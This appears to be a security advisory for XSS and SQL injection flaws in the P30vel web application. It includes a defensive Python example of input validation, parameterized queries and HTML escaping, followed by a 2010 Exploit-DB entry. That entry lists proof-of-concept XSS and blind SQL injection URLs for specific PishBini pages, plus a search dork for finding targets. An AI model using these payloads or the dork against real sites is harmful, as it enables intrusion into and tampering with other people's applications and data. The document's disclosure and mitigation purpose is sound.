Vendor: P30vel
By: indoushka
CVSS: 8.8 (HIGH)
Cross-site Scripting (XSS) and SQL Injection
CWE: 79, 89
Product Name: P30vel
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

XSS/SQL Vulnerability in P30vel

A Cross-site Scripting (XSS) and SQL Injection vulnerability was discovered in P30vel. An attacker can inject malicious code into the vulnerable application to execute arbitrary HTML and script code in the context of the affected site, or to access, modify and delete data in the back-end database.

Mitigation:

Input validation should be used to prevent the execution of malicious code. Parameterized queries should be used to prevent SQL injection.
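The two mitigations named above, applied to the advisory's `gid` and `forms` parameters, as an added example that is not part of the advisory or of the P30vel code. The `winners` table, its columns and the sample rows are constructed assumptions, and an in-memory SQLite database stands in for the application's back end.

```python
import html
import sqlite3


def make_db():
    """Constructed sample data; table and column names are assumptions."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE winners (gid INTEGER, name TEXT)")
    con.executemany("INSERT INTO winners VALUES (?, ?)",
                    [(170, "alice"), (171, "bob")])
    return con


def winners_vulnerable(con, gid):
    # The pattern behind the advisory: the raw query-string value is pasted
    # into the SQL text, so operators and a trailing "--" comment in `gid`
    # are evaluated by the database instead of being treated as a number.
    sql = f"SELECT name FROM winners WHERE gid = {gid}"
    return [row[0] for row in con.execute(sql)]


def winners_fixed(con, gid):
    # 1) Input validation: `gid` must be a plain decimal integer. Anything
    #    else (spaces, keywords, comment markers) is rejected before any SQL
    #    is built, which is the check that is missing in the vulnerable form.
    if not gid.isdigit():
        raise ValueError("gid must be an integer")
    # 2) Parameterized query: the value is bound by the driver and can never
    #    change the structure of the statement.
    sql = "SELECT name FROM winners WHERE gid = ?"
    return [row[0] for row in con.execute(sql, (int(gid),))]


def render_forms(value):
    # Output encoding for the reflected `forms` parameter: the browser
    # receives the characters as text, so <marquee>/<script> markup in the
    # parameter is displayed rather than rendered.
    return "<p>You searched for: %s</p>" % html.escape(value, quote=True)
```

With the advisory's payload `170 and 31337-31337=0 --` (URL-decoded), `winners_vulnerable` still returns the row for gid 170 because the database evaluated the injected expression, while `winners_fixed` rejects the value before it reaches SQL.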

Exploit-DB raw data:

########################################################################
# Vendor: http://www.p30vel.ir/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : indoushka@hotmail.com
# Home :
# Bug  : (XSS/SQL)
# Tested on : windows SP2 Français V.(Pnx2 2.0)
########################################################################

# Dork : Copyright 2010. Software Index

# Exploit By indoushka

( XSS / HTML Inject ) :

http://127.0.0.1/PishBini/login.php/>"><marquee><font%20color=gren%20size=30>EL-KAHINA My Sister</font></marquee>

( XSS ) :

http://127.0.0.1/PishBini/admin/index.php?>"'><ScRiPt>alert(213771818860)</ScRiPt>

( SQL ) :

http://127.0.0.1/PishBini/index.php?forms=<marquee><font%20color=gren%20size=30>EL-KAHINA</font></marquee>

( Blind SQL/XPath injection) :

http://127.0.0.1:80/PishBini/winners.php?gid=170+and+31337-31337=0+--+

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------